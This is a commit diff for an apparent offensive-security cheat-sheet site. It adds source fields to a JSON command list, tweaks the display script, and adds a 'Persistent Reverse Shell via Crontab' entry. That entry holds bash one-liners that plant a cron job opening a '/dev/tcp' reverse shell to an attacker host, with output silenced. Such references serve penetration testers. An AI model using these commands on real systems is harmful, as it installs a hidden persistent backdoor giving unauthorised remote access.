last added entry goes at the top

Nickguitar · Oct 20, 2023 · 04f2b1b · 04f2b1b
1 parent 9410da9
commit 04f2b1b
Show file tree

Hide file tree

Showing 2 changed files with 53 additions and 5 deletions.
diff --git a/src/output.json b/src/output.json
@@ -39,6 +39,7 @@
       "LFI",
       "RCE"
     ],
+    "source": [],
     "data": [
       {
         "description": "",
@@ -60,6 +61,7 @@
       "PHP",
       "MySQL"
     ],
+    "source": [],
     "data": [
       {
         "description": "",
@@ -76,6 +78,7 @@
       "zip",
       "crypto"
     ],
+    "source": [],
     "data": [
       {
         "description": "",
@@ -91,6 +94,7 @@
       "rev",
       ".NET"
     ],
+    "source": [],
     "data": [
       {
         "description": "First download both to /opt:",
@@ -112,6 +116,7 @@
       "android",
       "bash"
     ],
+    "source": [],
     "data": [
       {
         "description": "Usage: logcat com.example.app",
@@ -129,6 +134,7 @@
       "android",
       "bypass"
     ],
+    "source": [],
     "data": [
       {
         "description": "Substitute <com.example.app>:",
@@ -176,6 +182,7 @@
       "bash",
       "bug bounty"
     ],
+    "source": [],
     "data": [
       {
         "description": "",
@@ -192,6 +199,7 @@
       "android",
       "bash"
     ],
+    "source": [],
     "data": [
       {
         "description": "First download both to /opt:",
@@ -240,6 +248,7 @@
       "bash",
       "apk"
     ],
+    "source": [],
     "data": [
       {
         "description": "Usage: pull-apk <package id>:",
@@ -254,6 +263,7 @@
     "tags": [
       "misc"
     ],
+    "source": [],
     "data": [
       {
         "description": "Substitute <file>:",
@@ -269,6 +279,7 @@
       "linux",
       "forensics"
     ],
+    "source": [],
     "data": [
       {
         "description": "",
@@ -285,6 +296,7 @@
       "osint",
       "misc"
     ],
+    "source": [],
     "data": [
       {
         "description": "Substitute <IP ADDRESS>:",
@@ -319,6 +331,7 @@
       "RCE",
       "bypass"
     ],
+    "source": [],
     "data": [
       {
         "description": "Alternative PHP extensions:",
@@ -346,6 +359,9 @@
       "misc",
       "bash"
     ],
+    "source": [
+      "https://www.commandlinefu.com/commands/view/6051/get-all-shellcode-on-binary-file-from-objdump"
+    ],
     "data": [
       {
         "description": "",
@@ -363,6 +379,7 @@
       "misc",
       "enum"
     ],
+    "source": [],
     "data": [
       {
         "description": "Substitute <URL>:",
@@ -378,6 +395,7 @@
       "linux",
       "misc"
     ],
+    "source": [],
     "data": [
       {
         "description": "List files with activated SUID bit",
@@ -398,6 +416,7 @@
       "crypto",
       "misc"
     ],
+    "source": [],
     "data": [
       {
         "description": "Encrypt (substitute <FILE>):",
@@ -418,6 +437,7 @@
       "enum",
       "android"
     ],
+    "source": [],
     "data": [
       {
         "description": "Substitute <app.apk>:",
@@ -430,5 +450,34 @@
         "command": "# Download https://github.com/n0mi1k/apk2url (also download required dependencies)\n./apk2url.sh <app.apk>"
       }
     ]
+  },
+  {
+    "title": "Persistent Reverse Shell via Crontab",
+    "description": "",
+    "tags": [
+      "linux",
+      "bash",
+      "backdoor"
+    ],
+    "source": [
+      "https://gist.github.com/hoefler02/2ca8166c167f147c8fb076b48eb7cb47"
+    ],
+    "data": [
+      {
+        "description": "Overwrites existing crontabs:",
+        "language": "bash",
+        "command": "(touch .tab ; echo \"* * * * * <reverse-shell-of-choice>\" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1"
+      },
+      {
+        "description": "Keeps existing crontabs:",
+        "language": "bash",
+        "command": "(crontab -l > .tab ; echo \"* * * * * <reverse-shell-of-choice>\" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1"
+      },
+      {
+        "description": "Example sending bash reverse shell every 5 min:",
+        "language": "bash",
+        "command": "(touch .tab ; echo \"*/5 * * * * /bin/bash -c '/bin/bash -i >& /dev/tcp/attacker/port 0>&1'\" >> .tab ; crontab .tab ; rm .tab) > /dev/null 2>&1"
+      }
+    ]
   }
 ]
diff --git a/src/script.js b/src/script.js
@@ -17,8 +17,8 @@ function writeHeaderAndFooter(){
 var jsonData;
 async function fetchJsonData() {
     try {
-        var response = await fetch('https://weaponize.s3.us-east-2.amazonaws.com/output.json');
-//        var response = await fetch('output.json');
+//        var response = await fetch('https://weaponize.s3.us-east-2.amazonaws.com/output.json');
+        var response = await fetch('output.json');
         jsonData = await response.json();
         displayJSON(jsonData);
     } catch (error) {
@@ -43,7 +43,7 @@ function safeString(inputString) {
 function displayJSON(jsonData){
     var jsonListDiv = document.getElementById('jsonList');
 	isAbout = false;
-    jsonData.forEach((data, index) => {
+    jsonData.reverse().forEach((data, index) => {
     	if(data.tags[0] == "about" && window.location.hash == "#about"){
 	        var jsonContainer = document.createElement('div');
 	        jsonContainer.innerHTML = `<a href="#${safeUrl(data.title)}"><h1 id="${safeUrl(data.title)}">${safeString(data.title)}</h1></a>
@@ -78,8 +78,7 @@ function displayJSON(jsonData){
         });
         jsonContainer.appendChild(dataDiv);
 
-		if(data.source){
-			console.log(data.source.length)
+		if(data.source.length){
 			var source = document.createElement('small');
 			if(data.source.length == 1){
 				source.innerHTML = `<p><a class='source' href='${safeString(data.source[0])}' target='_blank'>Source</a></p>`;